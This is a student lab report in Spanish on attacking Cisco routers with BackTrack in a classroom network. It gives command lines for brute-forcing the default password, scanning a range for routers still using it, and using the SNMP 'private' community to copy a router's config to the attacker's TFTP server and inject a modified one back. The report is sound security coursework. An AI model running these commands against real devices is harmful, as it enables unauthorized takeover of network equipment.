Santiago Sur

Ingeniera en Telecomunicaciones,
Conectividad y Redes
Seguridad en Redes

ATAQUES CON BACKTRACK
Nombre Alumno (s): Elias Cossio
Jorge Quezada
Nombre Profesor: Rene Guerrero
Fecha: 12 de noviembre de 2013




Cisco Auditing Tool

La topologa que utilizaremos ser la siguiente.

Cisco Auditing Tool (CAT) es una mini herramienta de auditora de seguridad. Analiza
las vulnerabilidades ms comunes de los routers Cisco, como las contraseas por
defecto, las cadenas de comunidad SNMP y algunos de los antiguos errores del IOS.
Incluye tambien soporte para dems plugins y el escaneo de mltiples hosts.

Tras una previa configuracin de un router por defecto de sus contraseas lo que
aremos ser descubrir la clave de acceso y asi poder cambiar el router a nuestro gusto.
















Ahora vemos la ip de nuestro backtrack y probamos conectividad


















En BackTrack para iniciar la herramienta Cisco Auditing Tool nos vamos al
men Aplications - BackTrack - Vulnerability Assessment - Network Assessment - Cisco
Tools. Una vez que la ventana de la consola se haya cargado correctamente,
podremos mirar todas las opciones posibles que podemos utilizar en contra del nuestro
objetivo.












































Backtrack trae unas contraseas por defecto configuradas, pero para darle ms
posibilidades de encontrar la contrasea se puede editar un archivo e indicarle claves
para buscar.
Primero sacaremos la contrasea con las configuradas por defecto.
Utilizamos la siguiente opcin:
./CAT h 192.168.1.1




































Nos arroja como resultado que la contrasea arrojada fue cisco esta clave la
probaremos despus haciendo un telnet desde aqu.
Ahora editaremos el archivo.










Con el comando:
Nano /pentest/cisco/cisco-auditing-tool/lists/passwords


Una vez editado el archivo guardamos y utilizamos la siguiente secuencia para
descubrir la contrasea:
./CAT -h 192.168.1.1 -a lists/passwords














Nos arroja la misma contrasea anterior cisco ahora vamos a probar si es la correcta
realizando un telnet.






























Cisco Passwd Scanner
La topologa que utilizaremos para realizar las pruebas ser la siguiente

















Cisco passwd scanner es una herramienta incluida en el grupo de vulnerabilidades
Cisco. Su funcin principal es buscar en un rango de IP que an no han sido
configurados correctamente y que por ende, tenga activada la contrasea por
defecto en el equipo.
Comenzamos abriendo la herramienta.
















Nos aparecer un terminal como el siguiente


La herramienta realizara un scanner sobre toda la red que se le indique verificando
cuales routers existentes dentro de la red tienen activada la contrasea por defecto
cisco. El scanneo se realiza a travs de un ataque de fuerza bruta de un solo intento,
probando la palabra de cisco en cada uno de los routers encontrados. Si la conexin
con la contrasea cisco es exitosa, la direccin del router ser listada en los
resultados del comando.









El comando que utilizaremos ser el siguiente
./ciscos 192.168.1 3 t 10















Los resultados son escritos en un archivo de texto llamado cisco.txt que se ubica en la
carpeta /pentest/cisco/ciscos.
















Ahora probaremos los resultados realizando telnet a esas direcciones




















Copy Router Config

Consiste en tomar la configuracin (Running-config) de un router, y llevarla como un
archivo, mediante tftp, hasta la mquina con la cual se est haciendo el ataque.

La imagen muestra la topologa utilizada, donde la Nube representa la mquina
desde donde se realizaron los ataques.
Nota: Para realizar este ataque, se necesita tener configurado un servidor tftp, en este
caso, en el equipo BACKTRACK.



La captura anterior muestra el men donde se encuentra la aplicacin para realizar el
ataque: copy-router-config.

En la captura anterior, se resalta, mediante un cuadro amarillo la lnea de comando
para hacer efectivo el ataque: perl copy-router-config.pl 192.168.1.20 [IP ROUTER]
192.167.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp
configuradas en el router]
Luego de procesar el ataque, el sistema enva un OK, indicando que fue realizado con
xito.



En la captura anterior se ingresa al directorio que contiene los archivos que se han
transferido mediante el protocolo TFTP. En este caso, el archivo de configuracin del
Router atacado ha enviado el archivo pwnd-router.config.





Finalmente, al ingresar al archivo, se puede apreciar la configuracin del router. En los
cuadros de color amarillo se destaca el hostname y la configuracin de la interfaz f 0/0
que se configur para realizar el laboratorio. As se comprueba que, efectivamente, el
ataque ha sido realizado con xito.





Merge Router Config

Es la operacin inversa al ataque anterior (Copy Router Config), y por lo general se
trabaja con mbos. Consiste en modificar el archivo de configuracin que el router le
entrega a BackTrack para luego volver a inyectarlo al mismo router, con una nueva
configuracin.
Se utiliz la misma topologa que en el ataque Copy Router Config.









Se han modificado algunos parmetros, por ejemplo, el hostname pasar de R1 a
ROUTER_ATACADO; las interfaces tendrn ahora descripciones y finalmente se ha
configurado una de las lneas vty con un password, adems de un mensaje banner.



La marca amarilla indica la aplicacin que se utilizar para el ataque: merge config
router



La lnea de comando es la siguiente: perl merge-router-config.pl 192.168.1.20 [IP
ROUTER] 192.168.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp
configuradas en el router].
Luego, el correspondiente OK para confirmar que el ataque ha sido realizado con
xito.



Inmediatamente, en la consola del router aparece un mensaje indicando que se ha
cargado una configuracin nueva a travs de la ip 192.168.1.10 (BACKTRACK) va tftp.



Finalmente, se procede a revisar la configuracin del router, y efectivamente, los
cambios realizados en el archivo se han cargado con xito. Se aprecia el cambio de la
lnea vty 0, la descripcin de la interfaz, el banner motd.